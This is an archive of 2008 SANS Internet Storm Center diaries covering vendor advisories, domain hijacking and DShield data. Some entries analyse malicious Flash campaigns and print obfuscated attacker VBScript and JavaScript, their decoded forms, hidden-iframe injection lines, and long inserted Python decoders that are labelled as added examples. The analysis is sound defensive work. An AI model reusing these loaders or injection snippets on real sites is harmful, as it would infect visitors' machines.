Published: 2008-05-31

Microsoft Security advisory for Safari and Windows

The Microsoft Security Response Center (MSRC) has posted an entry alerting Safari users on Windows to a security issue (advisory 953818).  As many of you know, Apple distributed the Safari browser to Windows users, first as an “update” and later as new software, but still selected for installation by default.  So it was really only a matter of time before something nasty took advantage of it.

The way I read it, the blended threat takes advantage of something Safari asks Windows to do.  Currently the advice is “Customers who have changed the default location where Safari downloads content to the local drive are not affected by this blended threat.”  In other words, if you are using Safari on Windows, change the default download location.

If you have details of this threat please contact us.

Update:  the issue may be related to http://www.oreillynet.com/onlamp/blog/2008/05/safari_carpet_bomb.html

Mark - Shearwater


Published: 2008-05-30

ISC Flyer is ready

The new ISC flyer is ready. Thanks everybody for their feedback. We got about 50 people sending suggestions about what to include. What you find in this version of a flyer is based on the most frequently requested features, with some consideration to space.

We offer the flyer as a PDF. To print it, you need legal-size paper. However, we plan to include the flyer in our next SANSFIRE mailing. If you are interested in receiving this flyer and currently do not receive any SANS mailings, make sure you are registered at the SANS portal (a complete and correct mailing address is important, of course).

To download the flyer: http://isc.sans.org/presentations/iscflyer.pdf

While I was working on this, I also added links to some other flyers/cheatsheets SANS offers for download. See http://isc.sans.org/presentations.

The ultimate goal is to set up a "make your own flyer" web application, but this will take a while. Layout of the flyer is rather tricky, as we try to squeeze as much content as possible into it.

Corrections / suggestions: Please use our contact page.

Johannes Ullrich


Published: 2008-05-30

Where did my domain go?

This is a question you don’t want to be asking yourself while looking at where your main web page should be.   Steve L wrote in yesterday and mentioned that the Comcast network web site at Comcast.net looked like it was under construction.  I wrote it off as website maintenance (sorry Steve).  I guess it was a little bit more than that (in my defence, it was an under-construction notice, which some people put up when performing maintenance on their site).  That changed a little later on in the evening.

Comcast had their domain snaffled away from them.   The account Comcast uses with Network Solutions was used to alter the records and redirect the site.  It won’t be the last time this happens.  People have reported increased phishing attempts to gain access to registrar accounts.   The registrar I use is actively training its clients to click links in the numerous emails it sends promoting stuff, probably not one of its better ideas, and I doubt it is alone in this practice.

There is money to be made in domain names.  We all understand the value of branding, and getting the right name can help launch a product, company or people.   Registrars earn their living by providing as many names as possible; the process therefore has to be easy and flexible, hence the click-here links in emails.  Now hands up who can actually remember the userid and password they use for their registrar?  (PS: feel free to mail them in.)  Pretty much every time I need to do something with the registrar I have to request the password or, depending on the registrar, you can fax a request, on letterhead, through to them for action.  In a past life, when we needed access to the client’s domain information, we would typically just fax through a request to the registrar on letterhead (yes, with permission).  About 30 minutes later we’d have access to the domain.  I’m not saying it is still as easy, but.....

Which brings me to a friend of mine (no sniggering Mike), his mate had his domain name taken from him.  It came up for registration and due to timezones, he paid late.  Turns out someone was watching the domain and snapped it up as soon as it expired.  Two years of building a brand, gone in a few minutes.  He could get it back for a bargain, USD$10,000.   In another case the email address associated with the registrar account was changed (letterhead request), then a simple password reset and a transfer, voila one domain name gone.   If you spend some time on certain sites, you soon see that there are groups dedicated to grabbing desirable domain names, especially those that have established sites.  Of course the SPAM and malware delivery side of the business does equally well.

The moral of the story: protecting something as seemingly trivial as the userid and password of the account used to manage your domain names can make or break a business.  Luckily some registrars play ball and help out in these situations, but around the globe there are certainly some challenges.

Mark H - Shearwater


Published: 2008-05-29

Creative Software AutoUpdate Engine ActiveX stack buffer overflow

Reader Mark wrote in with a bit of intel about a Stack Based Buffer Overflow for Creative Software's AutoUpdate Engine through ActiveX.

Thanks to Mark and eEye who provided the vulnerability information here.

CLSID (Killbit) for this one is: 0A5FD7C5-A45C-49FC-ADB5-9952547D5715


For more information than you can stand about Killbits and how to set them check out a Google search of our own site.





Joel Esler



Published: 2008-05-29

Apple Update 10.5.3 and Apple Security Update 2008-003

Apple released a huge update today in 10.5.3; however, I'm only going to highlight the security portion of the update, 2008-003.  Some of these are purely Apple updates, some are simply updates to the open source packages that Apple provides in its operating system.

Updates to the following modules were made:

AFP Server -- Files that are not designated for sharing may be accessed remotely.

Apache -- Multiple vulnerabilities in Apache 2.0.55, including cross-site scripting.  Apache is updated to version 2.0.63 to address several vulnerabilities.

AppKit -- Maliciously crafted file, unexpected application termination, arbitrary code execution.

Apple Pixlet Video -- Vulnerability to unexpected application termination, arbitrary code execution.

ATS -- Vulnerability to arbitrary code execution

CFNetwork -- Vulnerability leading to disclosure of sensitive information

CoreFoundation -- Vulnerability leading to unexpected application termination or arbitrary code execution.

CoreGraphics -- Vulnerability that may lead to an unexpected application termination or arbitrary code execution.

CoreTypes -- Lack of prompting against opening "certain potentially unsafe content types" in Automator, Help, Safari, and Terminal.

CUPS -- Information disclosure.

Flash Player Plug-in -- Arbitrary code execution, Updating to version

Help Viewer -- Vulnerability to application termination or arbitrary code execution.

iCal -- Vulnerability to unexpected application termination or arbitrary code execution.

International Components for Unicode -- Disclosure of sensitive information.

Image Capture -- Path traversal vulnerability.

ImageIO -- Out-of-bounds memory read leading to information disclosure, Multiple vulnerabilities in libpng version 1.2.18, and Vulnerability to unexpected application termination or arbitrary code execution.

Kernel -- Remote vulnerability to unexpected system shutdown due to undetected failure condition and Local user vulnerability to unexpected system shutdown due to mishandling of code signatures.

LoginWindow -- Race condition preventing MCX preferences being applied

Mail -- IPv6 vulnerability leading to unexpected application termination, information disclosure, or arbitrary code execution.

ruby -- Remote vulnerability,  updated to version 1.1.4

Single Sign-On -- Password disclosure in sso_util

Wiki Server -- Remote vulnerability to information disclosure


Happy patching all!  I've upgraded three systems here, and I've had no problems that I can tell so far.


Joel Esler



Published: 2008-05-28

Reminder: Proper use of DShield data

Once in a while, we receive requests to remove an IP from our "blocklist", only to find out that the particular IP address isn't in our blocklist. Usually, it turns out that someone is using part of our DShield data in a way it is not supposed to be used.

DShield currently only publishes one blocklist: http://www.dshield.org/block.txt . It removes some of the obvious false positives. Of course, as with any block list, you should still use it at your own risk.

In addition, we are publishing the "Highly Predictive Blocklists" (http://www.dshield.org/hpbinfo.html). These blocklists are currently experimental, and a new version of the software should actually be released shortly.

Finally, there are a number of other "lists". For example, the following list is quite popular:


Note the big disclaimer at the top of this list:

# ipsascii.html

This list contains the top IPs, without any consideration to false positives.

Why don't we filter false positives?

Well, if it were easy, we would do it. But first of all, DShield is a research tool. It has to provide consistent and complete data. In a particular case that came up today, a site was under DDoS attack. Our sensors picked up backscatter traffic and reported it to us. As a result, the site ended up in 'ipsascii.html'. I'd rather keep this type of activity in my database. Measuring backscatter is one thing we can do with our data. Another common false positive is P2P afterglow. But in case there is active scanning for P2P networks, we need to know what this afterglow looks like in order to subtract it.

So again: stick to the recommended block lists. If you find an IP in our blocklist that shouldn't be there, let us know and we will remove it ASAP. But any raw data associated with the IP address will remain in our database. Finding an IP address in our database doesn't automatically mean that it is an "attacker" or "evil". To figure out what is happening, we need to look at the data in more detail.


Published: 2008-05-28

So, how do you monitor your website?

With all the talk of SQL injections and XSS and such, and all of these malicious SWFs, I was conversing with one of our readers, Steve, today and figured I'd ask the rest of you for some advice.  Steve has a script that he uses to monitor his website for malicious content, but I was wondering, beyond the obvious of using Tripwire, AIDE, Samhain, Osiris, etc., what do you use to monitor your own websites?  Let us know via the contact page, and we'll summarize the results this weekend.


Published: 2008-05-28

Another example of malicious SWF

Jerry wrote in to tell us of a new variant on the theme of SWF files being found in the wild. This one uses encoded VBScript to deliver its payload. A Google search for www.chliyi.com gives us over 5,000 hits! The likely method of getting the malicious scripts onto these web servers is SQL injection, so check your code regularly.

So, let's take a look at this one:


Which contains:

if (navigator.systemLanguage=='zh-cn')
document.writeln("<iframe src=hxxp://www.chliyi.com/img/info.htm width=0 height=0></iframe>");

Downloading hxxp://www.chliyi.com/img/info.htm gives us the following:

<Script Language="VBScript">
Song = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204
Function Hex2Str(ByVal Ans)
    For i = 1 To Len(Ans) Step 2
        If IsNumeric(Mid(Ans, i, 1)) Then
            tmpStr = tmpStr & Chr("&H" & Mid(Ans, i, 2))
        Else
            tmpStr = tmpStr & Chr("&H" & Mid(Ans, i, 4))
            i = i + 2
        End If
    Next
    Hex2Str = tmpStr
End Function
Document.Write Hex2Str(Song)
<script language="javascript"

This decodes using hex to string:

<Script Language=VBScript>
        On Error Resume Next
        Set Ob = Document.CreateElement("object")
        Ob.SetAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
        Set Pop = Ob.Createobject("Adodb.Stream","")
        If Not Err.Number = 0 then
                Document.write ("<embed src=\"flash.swf\"></embed>")
                Document.write ("<iFrame sRc=real.htm width=0 height=0></ifrAmE>")
                Document.write ("<iFrame sRc=new.htm width=0 height=0></ifrAmE>")
                Document.write ("<iFrame sRc=help.htm width=0 height=0></ifrAmE>")
        End If
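
The decoding step, as an added example written for this diary (it is neither the attacker's script nor the diary's own tooling): a Python port of the Hex2Str routine, run over the visible prefix of the Song string and over a constructed input that exercises the four-digit branch. GBK for the double-byte values is an assumption, chosen because the script only fires for zh-cn browsers.

```python
# Python port of the VBScript Hex2Str routine quoted above. The one non-obvious
# rule is the branch: a hex pair whose first digit is 0-9 is a single byte, while
# anything else (A-F) is read as four hex digits, i.e. one double-byte character,
# which is how the script can carry Chinese text alongside plain ASCII.

# The hex string exactly as quoted in the diary (it is cut off after "4F6E204").
SONG_PREFIX = "3C536372697074204C616E67756167653D56425363726970743E0D0A094F6E204"


def hex2str_bytes(ans):
    """Walk the hex string the way the VBScript loop does and return raw bytes.

    Mirrors `For i = 1 To Len(Ans) Step 2` with the `i = i + 2` in the Else
    branch. A dangling odd digit at the end (truncated capture) is dropped
    rather than raising, so a partial string still decodes as far as it goes.
    """
    out = bytearray()
    i = 0
    while i < len(ans):
        if ans[i].isdigit():          # IsNumeric(Mid(Ans, i, 1))
            chunk, step = ans[i:i + 2], 2
        else:
            chunk, step = ans[i:i + 4], 4
        if len(chunk) % 2:            # cut off mid-byte
            break
        out += bytes.fromhex(chunk)
        i += step
    return bytes(out)


def hex2str(ans, codec="gbk"):
    """Decode to text. Assumption: the double-byte values are in the victims'
    system code page; GBK is used here because the script targets zh-cn."""
    return hex2str_bytes(ans).decode(codec, errors="replace")


if __name__ == "__main__":
    print(repr(hex2str(SONG_PREFIX)))
    # Constructed input for the four-digit branch: "H" followed by GBK C4E3.
    print(repr(hex2str("48C4E3")))
```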

Let's get hxxp://www.chliyi.com/img/flash.swf, which gives us:

file flash.swf
flash.swf: Macromedia Flash data, version 9

swfdump flash.swf
[HEADER]        File version: 9
[HEADER]        File size: 858
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 771
[HEADER]        Movie width: 550.00
[HEADER]        Movie height: 400.00
[045]         4 FILEATTRIBUTES
[006]       336 DEFINEBITS defines id 0682
==== Error: Unknown tag:0x056 ====
[056]        40 (null)
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
==== Error: Unknown tag:0x056 ====
[056]        12 (null)
==== Error: Unknown tag:0x052 ====
[052]       383 (null)
==== Error: Unknown tag:0x04c ====
[04c]        25 (null)
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END

Which looks familiar to us now.
real.htm, new.htm, help.htm are also quite interesting.

strings flash.swf shows us another possible malware location:
FWS     Z
flash.display   MovieClip

I munged the name of the file to pass language filters.
When I checked jj120.com resolved to and didn't
want to give me the file.

Thanks again Bojan and Jeremy!

Adrien de Beaupré
Bell Canada, Professional Services


Published: 2008-05-28

Followup to Flash/swf stories

We've received quite a bit of mail about our stories yesterday about the malicious SWF files attempting to exploit older versions of the Adobe Flash player.  So, here are a few of the things that have come out of our discussions.

  1. Our friends over at shadowserver.org (thanx, Steven) have a nice writeup that includes a bunch of domains they've noted that have the malicious SWF files.
  2. If you aren't sure which version of the flash player you are using, Adobe provides this page where you can check for yourself.
  3. On closer examination, this does not appear to be a "0-day exploit".  Symantec has updated their threatcon info, as well.
  4. It appears that this exploit may be included in the Chinese version of the MPack exploit toolkit (among others).
  5. In case we weren't clear about it earlier, it appears that the infected web sites check which browser you are using in addition to the flash player version to determine which exploit to deliver.

There are several ways to protect yourself even if you have a vulnerable version of the Flash player.

  • In Firefox, you can use either of the following add-ons, NoScript (one of our favorites, found here or here) or FlashBlock (here or here).
  • In IE, see here for how to set the "killbit", the CLSID is BD96C556-65A3-11D0-983A-00C04FC29E36.


Published: 2008-05-28

Podcast Episode Five has been released

Morning everyone,

Just a quick note to let everyone know that we put out Podcast Episode 5 this morning.  We had a special guest with us!  Larry Pesce of PaulDotCom Security Weekly!  The guys over at PaulDotCom do a great job, and we loved having Larry on the show!  Congratulations to Paul, as he is home with a new baby!

Don't forget the Live Podcast that we are doing at SANSFIRE on July 23rd at 8pm.

iTunes users, go here to subscribe.

Non-iTunes users, go here to download.



Joel Esler



Published: 2008-05-27

Malicious swf files?

Marco and Eric wrote in to let us know of a potentially malicious site found at


The JPG file is actually a script, shown below:

window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace
(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);2.q="i=K;J=/;5="+5.I();n(L.y.t().k("s")>0){2.3(\'<r
A="z:u-x-v-w-H" Y="6://15.14.9/13/10/11/17/18.M#1a=4,0,19,0" l="0" m="0"
16="Z">\');2.3(\'<8 7="R" a="Q"/>\');2.3(\'<8 7="P" a="6://g.h.9/e/f/d/b/p.
c"/>\');2.3(\'<8 7="N" a="O"/>\');2.3(\'<8 7="S" a="#T"/>\');2.3(\'<X o="
6://g.h.9/e/f/d/b/p.c"/>\');2.3(\'</r>\')}W{2.3("<V o=6://g.h.9/e/f/d/b/U.c l=0 m=0>")}}',62,73,'||document|write||expires|http|name|param|com|value|

Using SpiderMonkey, it decodes to:

if(document.cookie.indexOf("playon=")==-1){var expires=new Date();expires.setTime(expires.getTime()+12*60*60*1000);
if(navigator.userAgent.toLowerCase().indexOf("msie")>0){document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0"
width="0" height="0" align="middle">');document.write('<param name="allowScriptAccess" value="sameDomain"/>');document.write('<param name="movie" value="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/07.swf"/>');
("<EMBED src=hxxp://www.play0nlnie.com/pcd/topics/ff11us/20080311cPxl31/08.swf width=0 height=0>")}}
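
The packed script is the output of the p,a,c,k,e,r obfuscator (radix 62, 73 dictionary slots, as the `',62,73,'` tail shows). Instead of evaluating it in SpiderMonkey, the added example below (not part of the diary) inverts the packer statically; its sample wrapper and dictionary are constructed and reproduce only the fragments quoted above, not the full script.

```python
import re

# Constructed sample: a p,a,c,k,e,r wrapper whose payload and dictionary slots
# reproduce the fragments quoted in the diary (most of the 73 slots are empty,
# exactly as in the real thing, where a token equal to its own encoding gets '').
_DICT = [""] * 73
for _i, _w in {2: "document", 3: "write", 5: "expires", 6: "http", 7: "name",
               8: "param", 9: "com", 10: "value", 18: "playon", 19: "60",
               20: "indexOf", 23: "if", 26: "cookie", 28: "msie",
               29: "toLowerCase", 34: "userAgent", 37: "1000", 38: "setTime",
               39: "Date", 40: "var", 41: "new", 42: "getTime",
               47: "navigator", 52: "sameDomain", 53: "allowScriptAccess"}.items():
    _DICT[_i] = _w

_PACKED = (r"""n(2.q.k("i=")==-1){E 5=F D();5.C(5.G()+12*j*j*B);"""
           r"""n(L.y.t().k("s")>0){2.3(\'<8 7="R" a="Q"/>\')}}""")
SAMPLE = ("eval(function(p,a,c,k,e,d){/* decoder body elided */}('" + _PACKED
          + "',62,73,'" + "|".join(_DICT) + "'.split('|'),0,{}))")

# The trailing call: }('payload', radix, count, 'w0|w1|...'.split('|'), ...
_CALL_RE = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
    r"\s*'((?:[^'\\]|\\.)*)'\s*\.split\('\|'\)", re.S)


def js_unescape(s):
    """Undo the backslash escapes the packer uses inside its single-quoted string."""
    table = {"n": "\n", "r": "\r", "t": "\t"}
    return re.sub(r"\\(.)", lambda m: table.get(m.group(1), m.group(1)), s, flags=re.S)


def symbol_index(token, radix):
    """Invert the packer's e(c): digits, then a-z (10-35), then A-Z (36-61)."""
    n = 0
    for ch in token:
        if ch.isdigit():
            v = ord(ch) - ord("0")
        elif "a" <= ch <= "z":
            v = ord(ch) - ord("a") + 10
        elif "A" <= ch <= "Z":
            v = ord(ch) - ord("A") + 36
        else:
            return None
        if v >= radix:
            return None
        n = n * radix + v
    return n


def unpack(payload, radix, count, words):
    """Replace every \\b\\w+\\b token by its word, mirroring d[e(c)] = k[c] || e(c)."""
    def repl(m):
        tok = m.group(0)
        idx = symbol_index(tok, radix)
        if idx is None or idx >= count or idx >= len(words) or not words[idx]:
            return tok        # empty slot: the token already is the literal
        return words[idx]
    return re.sub(r"\b\w+\b", repl, payload, flags=re.ASCII)


def unpack_wrapper(text):
    """Locate the packed call inside eval(...) and return the decoded script."""
    m = _CALL_RE.search(text)
    if not m:
        raise ValueError("no p,a,c,k,e,r call found")
    payload, radix, count = js_unescape(m.group(1)), int(m.group(2)), int(m.group(3))
    return unpack(payload, radix, count, m.group(4).split("|"))


if __name__ == "__main__":
    print(unpack_wrapper(SAMPLE))
```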

Let's get the SWF files and see what they do; wget works.
file 07.swf
07.swf: Macromedia Flash data (compressed), version 9
file 08.swf
08.swf: Macromedia Flash data (compressed), version 9

Virustotal shows 0/32 for both files.

swftools can show us what the SWF files do:
swfdump -D 08.swf
[HEADER]        File version: 9
[HEADER]        File is zlib compressed. Ratio: 96%
[HEADER]        File size: 208 (Depacked)
[HEADER]        Frame rate: 12.000000
[HEADER]        Frame count: 1
[HEADER]        Movie width: 1.00
[HEADER]        Movie height: 1.00
[045]         4 FILEATTRIBUTES
[009]         3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018]        31 PROTECT
[00c00c]       138 DOACTION
                 (   99 bytes) action: Constantpool(5 entries)
String:"flashVersion" String:"/:$version"
String:"ff.swf" String:"_root"
                 (    4 bytes) action: Push Lookup:0 ("flashVersion") Lookup:1 ("/:$version")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: DefineLocal
                 (    4 bytes) action: Push Lookup:2
Lookup:0 ("flashVersion")
                 (    0 bytes) action: GetVariable
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:3 ("ff.swf")
                 (    0 bytes) action: Add2
                 (    2 bytes) action: Push Lookup:4 ("_root")
                 (    0 bytes) action: GetVariable
                 (    1 bytes) action: GetUrl2 64
                 (    0 bytes) action: Stop
                 (    0 bytes) action: End
[001]         0 SHOWFRAME 1 (00:00:00,000)
[000]         0 END
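
Both swfdump listings on this page (this one and the flash.swf listing in the "Another example of malicious SWF" diary above) come from the same header and tag structure. The added example below, written for this page rather than taken from swftools, parses that structure and builds a constructed sample SWF to run on; the names for tags 0x4c, 0x52 and 0x56, which the diary's swfdump reported as unknown, come from the SWF file format specification.

```python
import struct
import zlib

# Tag numbers from the SWF file format specification. swfdump printed 0x56, 0x52
# and 0x4c as "Unknown tag": they are the ActionScript 3 era tags, and DoABC (0x52)
# is where an AS3 movie keeps its bytecode, so a listing that looks "empty" apart
# from unknown tags still carries code worth looking at.
TAG_NAMES = {
    0: "END", 1: "SHOWFRAME", 6: "DEFINEBITS", 9: "SETBACKGROUNDCOLOR",
    12: "DOACTION", 24: "PROTECT", 59: "DOINITACTION", 69: "FILEATTRIBUTES",
    76: "SYMBOLCLASS", 82: "DOABC", 86: "DEFINESCENEANDFRAMELABELDATA",
}
SCRIPT_TAGS = {12, 59, 82}   # tags that carry executable ActionScript


class _BitReader:
    """MSB-first bit reader for the RECT record that starts the SWF body."""
    def __init__(self, data):
        self.data, self.pos, self.bit = data, 0, 0

    def read(self, n):
        v = 0
        for _ in range(n):
            v = (v << 1) | ((self.data[self.pos] >> (7 - self.bit)) & 1)
            self.bit += 1
            if self.bit == 8:
                self.bit, self.pos = 0, self.pos + 1
        return v

    def byte_pos(self):           # next byte-aligned offset
        return self.pos + (1 if self.bit else 0)


def parse_swf(blob):
    """Return header fields and [(tag_code, length), ...] for an FWS/CWS file."""
    sig, version = blob[:3], blob[3]
    length = struct.unpack_from("<I", blob, 4)[0]   # uncompressed size incl. header
    if sig == b"CWS":
        body = zlib.decompress(blob[8:])
    elif sig == b"FWS":
        body = blob[8:]
    else:
        raise ValueError("not an SWF: signature %r" % sig)
    br = _BitReader(body)
    nbits = br.read(5)
    xmin, xmax, ymin, ymax = (br.read(nbits) for _ in range(4))  # twips; read unsigned
    pos = br.byte_pos()
    frame_rate = struct.unpack_from("<H", body, pos)[0] / 256.0  # 8.8 fixed point
    frame_count = struct.unpack_from("<H", body, pos + 2)[0]
    pos += 4
    tags = []
    while pos + 2 <= len(body):
        hdr = struct.unpack_from("<H", body, pos)[0]
        code, tlen = hdr >> 6, hdr & 0x3F
        pos += 2
        if tlen == 0x3F:                                  # long form: 32-bit length
            tlen = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        tags.append((code, tlen))
        pos += tlen
        if code == 0:
            break
    return {"compressed": sig == b"CWS", "version": version, "length": length,
            "width": (xmax - xmin) / 20.0, "height": (ymax - ymin) / 20.0,
            "frame_rate": frame_rate, "frame_count": frame_count, "tags": tags}


def script_tags(info):
    """Names of the tags that hold code: the first thing to look at in triage."""
    return [TAG_NAMES.get(c, "UNKNOWN_0x%02x" % c) for c, _ in info["tags"] if c in SCRIPT_TAGS]


def _rect(nbits, *vals):
    bits = format(nbits, "05b") + "".join(format(v, "0%db" % nbits) for v in vals)
    bits += "0" * (-len(bits) % 8)
    return int(bits, 2).to_bytes(len(bits) // 8, "big")


def _tag(code, payload):          # short tag header: code<<6 | length (length < 63)
    return struct.pack("<H", (code << 6) | len(payload)) + payload


def build_sample_swf(compress):
    """Constructed 550x400, 12 fps, one-frame SWF 9 with an empty DoAction tag."""
    body = (_rect(15, 0, 550 * 20, 0, 400 * 20)
            + struct.pack("<HH", 12 << 8, 1)
            + _tag(69, b"\x00\x00\x00\x00")      # FILEATTRIBUTES
            + _tag(9, b"\xff\xff\xff")           # SETBACKGROUNDCOLOR white
            + _tag(12, b"\x00")                  # DOACTION holding just ActionEnd
            + _tag(1, b"") + _tag(0, b""))       # SHOWFRAME, END
    data = zlib.compress(body) if compress else body
    return (b"CWS" if compress else b"FWS") + bytes([9]) + struct.pack("<I", 8 + len(body)) + data


if __name__ == "__main__":
    info = parse_swf(build_sample_swf(compress=True))
    print(info, script_tags(info))
```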

Running the swf files in a web browser gives me the following URLs:
Both of which got me a big fat 404.
Either the final files have been removed, or are looking for a different version of the player.

Thanks to Bojan and Jeremy for their help!

It is unknown at this time whether these SWF files are related to this vulnerability.

Adrien de Beaupre
Bell Canada


Published: 2008-05-27

Adobe flash player vuln

A vulnerability has been reported in Adobe Flash Player versions and older, which is the current version available for download now. Adobe has not yet released a patch nor an official advisory. Stay tuned for further developments.

Update1: Symantec has observed that this issue is being actively exploited in the wild and have elevated their ThreatCon.

Update2: A SecurityFocus article is now live here.

Adrien de Beaupré
Bell Canada


Published: 2008-05-27

Suggestions wanted for ISC

For the last few years, we have handed out an "ISC Flyer" / "Cheat sheet" at SANS conferences. It currently includes things like a port list, various NOC/abuse desk contact info and such. However, the flyer is very out of date. So my question to you all:

What would you like to see on a flyer like that? What would you find useful enough to hang on your cubicle wall?

We have a legal-size sheet of paper that will be folded in three and can be printed on both sides. Font size can be on the small side. The result will be downloadable as a PDF.

Please use our contact page to submit your ideas.


Published: 2008-05-26

Port 1533 on the Rise

Take a look at port 1533.  That's quite an increase in targeted computers reporting via DShield over the past few days.  Anybody got some good packet captures showing what is going on?  If so, send them to us via our contact page so we can analyze them. 

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-05-26

Predictable Response

Incident handling and management calls for developing well-understood and predictable responses to emergencies or damaging events as they occur.  Frequent rehearsal of the response steps makes recovery from an incident faster and usually more successful.    But predictable behavior can also be used against us, if an adversary knows (or can predict) what you will do when faced with a series of unfolding events.

Some examples from the recent past include Y2K, the various terrorist attacks this decade, and natural disasters like Hurricane Katrina, the Indonesian tsunami, and the recent earthquakes in China.  With Y2K, do you remember the wild panic of trying to find Cobol programmers at the last minute who could fix the two-digit date fields?  Predictably, a lot of that programming got contracted to outside organizations - a well-trained adversary could have established multiple software companies that could have been used to insert malicious backdoors and booby traps into mainframes, control networks, and other critical computer systems.  In the days following Hurricane Katrina's landfall, we predictably saw over a thousand websites get established that offered a mechanism for getting donations to the affected families.  All they needed was your credit card number.  Yeah, right.

Most readers of the SANS Internet Storm Center's diaries know that we've followed nearly all of these events and sometimes we even predicted a few of them ourselves.  So now it's time to go out on a limb again.  Everybody is aware of the rapid rise in oil futures (the cost per barrel for crude oil), and if you drive a car you feel the result every time you fill up.  This morning I saw that the local station near my house had crossed the $4 per gallon threshold overnight.  I know that in Europe and Asia, $4 per gallon (that's about 0.67 Euros/Liter) is VERY cheap but it's about twice what we were paying for it this time last year.  If gas prices continue to climb at the current rate, they could well double by the end of the year.  So, here's the predictable behavior.  With gas prices that high, many people will prefer to work from home rather than driving or taking public transportation, thus putting a heavy load on ISPs and the Internet in general due to telecommuting.  So, if you were a Bad Guy, how would you take advantage of this predictable behavior? 

Some ideas come to mind, such as establishing web portals for work collaboration or marketing a new anti-virus solution for protecting home computers used for office work.  Either of those would of course include a "value added feature" designed to siphon off sensitive information for criminal or espionage purposes.  I'm sure there are many more evil ideas, so if you have any, send them this way and we'll add them to the bottom of this diary.

UPDATE 1 - Here are a few ideas submitted by readers.  Feel free to use the "comment" capability or to send us your ideas via our contact page.  Either is fine.

Boris offered these thoughts:

If I was a bad guy and I wanted to take advantage of the increasing number of people working from home, I would increase the amount of key-logging and screen capture software that I was sending out.

Not only would this allow me to gain even deeper access into the compromised local machine through passwords but it would also allow me an unrestricted form of entry into the company's servers and data centres since I would have appropriate passwords and no brute force hacking required.

Screen capture software would also allow me to gain access to all kinds of sensitive documents and network plans, all useful for deeper attacks against the main servers of the company.

A reader wanting to remain anonymous said: 

There is already no shortage of people who will nav to a URL that they saw on *TV* in order to rid their computer of performance robbing mal-crap, without a single thought as to whose "free" scripted ActiveX is being driven down upon them as auto-magical quicksilver. 

Just who vouches for the ongoing security and iron clad compartmentalization of GoToMyPC and its ilk?  I could care less that Citrix is the backend and/or even a financial stake holder.  Citrix, in and of itself, is not hack proof.  Yet there are plenty of companies whose employees are already using G2MPC, whether or not the company actually knows about it and has officially sanctioned such whiz-bangy remote access "convenience." 

How many telecommute/work-from-home computers are going to be restricted only for official business use and quarantined from any/all personal use shenanigans??? 

Major corporations, who are already actively working on pandemic flu business continuity contingencies, may already have a vouched for infrastructure in place, that can sanely deal with any gas price related up tick in telecommuting/work-from-home.  How far these measures happen to trickle down to critical suppliers and business partners, who knows???   

Iain wrote to say: 

Here in the UK, GoToMyPC has recently been advertised on TV as a solution to accessing your office PC when at a remote meeting/presentation. Your suggested scenario of more home-working could also be driving this (unusual for the UK) advertising.

As a Sysadmin at a SMB, I use variations of VNC (specifically TightVNC) extensively within our network for support purposes. When working from home, I have to use a VPN to get past the firewall before using VNC to access specific machines. A free version of VNC that can connect 2 machines behind different firewalls (in a similar way to Windows Remote Support) would be useful to me. It would probably be useful to someone planning to work from home as well. Since VNC is open-source, it would be relatively easy for a malicious company to produce such a version containing monitoring components, then advertise it as a free alternative to GoToMyPC.

VPNs are another target. My company network hides behind an Exoserver (proprietary FreeBSD firewall device) and a Smoothwall (Linux firewall device). Both of these devices provide VPN solutions allowing me to connect to the company network from home. Smaller businesses may have nothing more complex than a firewall/router connected to ADSL with no VPN capability. A relatively cheap router could be flashed with new software to provide simple VPN capability, with a side order of backdoor and information siphoning, then marketed as a simple connection solution.

This scenario is DEFINITELY possible. I have signed up to a project from Samknows.com to independently monitor UK ADSL ISPs. They provide a Linksys WRT54 variant with custom software that constantly monitors and tests my home ADSL connection. It sits between my ISPs router and the rest of my home network, so it has access to everything that happens on my ADSL connection. I had to decide whether I trusted these people - in the end, participating in this trial is a way to give something back to the community - just like writing this response.

Marcus H. Sachs
Director, SANS Internet Storm Center


Published: 2008-05-25

Cisco's Response to Rootkit presentation

Although I'm still waiting to see a copy of the presentation online, Cisco evidently has seen it, and they have posted a response.

You can see Mike Poor's evaluation of the issue here, and then jump straight across to Cisco's quite lengthy response on their site. Cisco have in fact produced what could become the de facto enterprise process for good practice when deploying hardware and firmware. I can certainly see it being used by some internal auditors to keep us on our toes.





Published: 2008-05-23

Cisco IOS Rootkit thoughts

Sebastian Muniz of Core Security was due to give his talk on Cisco IOS rootkits at EUSecWest today.  After reading the interview with Sebastian Muniz by Sean Comeau, I began thinking of the implications for enterprise operations.

While most enterprises have come to distrust the OS and applications, most still implicitly trust devices.  Whether the device is a printer, a wireless access point, or a router, most operations teams do little beyond applying patches to vulnerable systems.  Most security teams avoid the clash with the operations teams over testing and hardening network devices.

In the case of the printers, we have seen many printer compromises over the years.  I first ran into one almost ten years ago.  These were old office document printers running AIX... you know the ones.  Since that event, I have handled on average 3 investigations a year where a core printer is involved in the theft of corporate data. 

Most organizations treat these devices as unmanaged machines leased from a third-party vendor.  The vendor barely supports the device beyond providing paper and toner.  Many of these printers have POTS capability (remote admin, status, as well as fax), network functionality, and wireless.  HP offers a lockdown guide and configuration tool to lock down their printers.  Here's a link:


